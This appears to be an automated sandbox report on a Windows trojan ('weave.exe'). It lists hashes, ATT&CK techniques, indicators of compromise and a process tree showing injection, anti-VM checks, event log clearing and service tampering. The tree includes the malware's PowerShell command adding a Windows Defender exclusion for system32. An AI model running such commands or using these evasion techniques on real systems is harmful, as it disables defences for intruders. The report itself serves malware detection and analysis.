6ee011dc3dc0568d97acddc89bfbae917c42a811a99cd851e17bae209e9e7506

Resubmissions

27/09/2024, 18:38

240927-w984jstgjr 10

27/09/2024, 18:31

240927-w6aftatfjk 10

Analysis

max time kernel
26s
max time network
29s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
27/09/2024, 18:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

weave.exe
Size

18.2MB
MD5

f293ebde82be4a4c20f5b58a05384108
SHA1

2240637695575a69e8918a9e9083d8f6d6a25356
SHA256

6ee011dc3dc0568d97acddc89bfbae917c42a811a99cd851e17bae209e9e7506
SHA512

a1a222e1203baad3141f2fbf3fca6f511842556c8175cdc6ea735e494aa9e923ef53d906c79bf53af1a1ec1e113cd70e5f06fb6068faf89912726e520e592224
SSDEEP

393216:duxU/9YlNS1YOmAP0ybcsOCdha3hgw7KQs6Qg5H2Ym8IBX3Iv:dP/9YzC3csZa3hgRgJIBXE

Score

10^/10

defense_evasion discovery evasion execution persistence themida trojan

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 4924 created 3284	4924	updater.exe	53
PID 4924 created 3284	4924	updater.exe	53
PID 4924 created 3284	4924	updater.exe	53
PID 4924 created 3284	4924	updater.exe	53
PID 4924 created 3284	4924	updater.exe	53
PID 4924 created 3284	4924	updater.exe	53
PID 1916 created 3284	1916	updater.exe	53
PID 1916 created 3284	1916	updater.exe	53
PID 1916 created 3284	1916	updater.exe	53
PID 1916 created 3284	1916	updater.exe	53
PID 1916 created 3284	1916	updater.exe	53
PID 1916 created 3284	1916	updater.exe	53

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cli_gui.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3208	powershell.exe
2544	powershell.exe
2712	powershell.exe
2480	powershell.exe
1512	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cli_gui.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cli_gui.exe

Executes dropped EXE 3 IoCs

pid	Process
1804	cli_gui.exe
4924	updater.exe
1916	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000200000002ab4e-9.dat	themida
behavioral1/memory/1804-20-0x00007FF6170F0000-0x00007FF617929000-memory.dmp	themida
behavioral1/memory/1804-37-0x00007FF6170F0000-0x00007FF617929000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cli_gui.exe

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2008	powercfg.exe
2812	powercfg.exe
3512	powercfg.exe
3336	powercfg.exe
5112	powercfg.exe
2084	powercfg.exe
3944	cmd.exe
4104	powercfg.exe
3124	powercfg.exe
3464	cmd.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\syscfg.cfg	weave.exe
File created	C:\Windows\system32\updater.exe	weave.exe
File opened for modification	C:\Windows\System32\Tasks\MicrosoftEdge	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1204	weave.exe
1804	cli_gui.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4924 set thread context of 2912	4924	updater.exe	96
PID 1916 set thread context of 2468	1916	updater.exe	118
PID 1916 set thread context of 1788	1916	updater.exe	125

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft\Edge\updater.exe	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1568	sc.exe
392	sc.exe
1344	sc.exe
1620	sc.exe
760	sc.exe
4756	sc.exe
4652	sc.exe
1360	sc.exe
4848	sc.exe
1928	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	weave.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1204	weave.exe
1204	weave.exe
1204	weave.exe
1204	weave.exe
1204	weave.exe
1204	weave.exe
1204	weave.exe
1204	weave.exe
3208	powershell.exe
3208	powershell.exe
4924	updater.exe
4924	updater.exe
2544	powershell.exe
2544	powershell.exe
4924	updater.exe
4924	updater.exe
4924	updater.exe
4924	updater.exe
4924	updater.exe
4924	updater.exe
4924	updater.exe
4924	updater.exe
2912	dialer.exe
2912	dialer.exe
2480	powershell.exe
2480	powershell.exe
2912	dialer.exe
2912	dialer.exe
2480	powershell.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
4924	updater.exe
4924	updater.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe
2912	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	2912	dialer.exe
Token: SeShutdownPrivilege	3512	powercfg.exe
Token: SeCreatePagefilePrivilege	3512	powercfg.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	4104	powercfg.exe
Token: SeCreatePagefilePrivilege	4104	powercfg.exe
Token: SeShutdownPrivilege	3336	powercfg.exe
Token: SeCreatePagefilePrivilege	3336	powercfg.exe
Token: SeShutdownPrivilege	3124	powercfg.exe
Token: SeCreatePagefilePrivilege	3124	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe
Token: SeUndockPrivilege	2480	powershell.exe
Token: SeManageVolumePrivilege	2480	powershell.exe
Token: 33	2480	powershell.exe
Token: 34	2480	powershell.exe
Token: 35	2480	powershell.exe
Token: 36	2480	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1204	weave.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1204 wrote to memory of 1804	1204	weave.exe	79
PID 1204 wrote to memory of 1804	1204	weave.exe	79
PID 1204 wrote to memory of 4924	1204	weave.exe	81
PID 1204 wrote to memory of 4924	1204	weave.exe	81
PID 1804 wrote to memory of 3840	1804	cli_gui.exe	82
PID 1804 wrote to memory of 3840	1804	cli_gui.exe	82
PID 3840 wrote to memory of 3208	3840	cmd.exe	83
PID 3840 wrote to memory of 3208	3840	cmd.exe	83
PID 1804 wrote to memory of 2788	1804	cli_gui.exe	84
PID 1804 wrote to memory of 2788	1804	cli_gui.exe	84
PID 2708 wrote to memory of 1568	2708	cmd.exe	89
PID 2708 wrote to memory of 1568	2708	cmd.exe	89
PID 2708 wrote to memory of 4756	2708	cmd.exe	90
PID 2708 wrote to memory of 4756	2708	cmd.exe	90
PID 2708 wrote to memory of 4652	2708	cmd.exe	91
PID 2708 wrote to memory of 4652	2708	cmd.exe	91
PID 2708 wrote to memory of 392	2708	cmd.exe	92
PID 2708 wrote to memory of 392	2708	cmd.exe	92
PID 2708 wrote to memory of 1360	2708	cmd.exe	93
PID 2708 wrote to memory of 1360	2708	cmd.exe	93
PID 4924 wrote to memory of 2912	4924	updater.exe	96
PID 3944 wrote to memory of 3512	3944	cmd.exe	99
PID 3944 wrote to memory of 3512	3944	cmd.exe	99
PID 3944 wrote to memory of 4104	3944	cmd.exe	100
PID 3944 wrote to memory of 4104	3944	cmd.exe	100
PID 3944 wrote to memory of 3336	3944	cmd.exe	101
PID 3944 wrote to memory of 3336	3944	cmd.exe	101
PID 3944 wrote to memory of 3124	3944	cmd.exe	102
PID 3944 wrote to memory of 3124	3944	cmd.exe	102
PID 2912 wrote to memory of 636	2912	dialer.exe	5
PID 2912 wrote to memory of 696	2912	dialer.exe	7
PID 2912 wrote to memory of 984	2912	dialer.exe	12
PID 2912 wrote to memory of 428	2912	dialer.exe	13
PID 2912 wrote to memory of 560	2912	dialer.exe	14
PID 2912 wrote to memory of 1004	2912	dialer.exe	15
PID 2912 wrote to memory of 1084	2912	dialer.exe	16
PID 2912 wrote to memory of 1176	2912	dialer.exe	18
PID 2912 wrote to memory of 1192	2912	dialer.exe	19
PID 2912 wrote to memory of 1260	2912	dialer.exe	20
PID 2912 wrote to memory of 1276	2912	dialer.exe	21
PID 2912 wrote to memory of 1316	2912	dialer.exe	22
PID 2912 wrote to memory of 1384	2912	dialer.exe	23
PID 2912 wrote to memory of 1408	2912	dialer.exe	24
PID 2912 wrote to memory of 1492	2912	dialer.exe	25
PID 2912 wrote to memory of 1528	2912	dialer.exe	26
PID 2912 wrote to memory of 1544	2912	dialer.exe	27
PID 2912 wrote to memory of 1708	2912	dialer.exe	28
PID 2912 wrote to memory of 1760	2912	dialer.exe	29
PID 2912 wrote to memory of 1792	2912	dialer.exe	30
PID 2912 wrote to memory of 1812	2912	dialer.exe	31
PID 2912 wrote to memory of 1848	2912	dialer.exe	32
PID 2912 wrote to memory of 1856	2912	dialer.exe	33
PID 2912 wrote to memory of 1880	2912	dialer.exe	34
PID 2912 wrote to memory of 1968	2912	dialer.exe	35
PID 2912 wrote to memory of 2032	2912	dialer.exe	36
PID 2912 wrote to memory of 1980	2912	dialer.exe	37
PID 2912 wrote to memory of 2132	2912	dialer.exe	39
PID 2912 wrote to memory of 2436	2912	dialer.exe	40
PID 2912 wrote to memory of 2548	2912	dialer.exe	41
PID 2912 wrote to memory of 2556	2912	dialer.exe	42
PID 2912 wrote to memory of 2620	2912	dialer.exe	43
PID 2912 wrote to memory of 2684	2912	dialer.exe	44
PID 2912 wrote to memory of 2700	2912	dialer.exe	45
PID 2912 wrote to memory of 2720	2912	dialer.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:428

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1176
- C:\Program Files\Microsoft\Edge\updater.exe
  "C:\Program Files\Microsoft\Edge\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1492
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2032

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2684

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2860

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3096

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3284
- C:\Users\Admin\AppData\Local\Temp\weave.exe
  "C:\Users\Admin\AppData\Local\Temp\weave.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Users\Admin\AppData\Local\Temp\cli_gui.exe
    "C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:1804
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:2788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:3580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:3500
- - C:\Windows\system32\updater.exe
    "C:\Windows\system32\updater.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
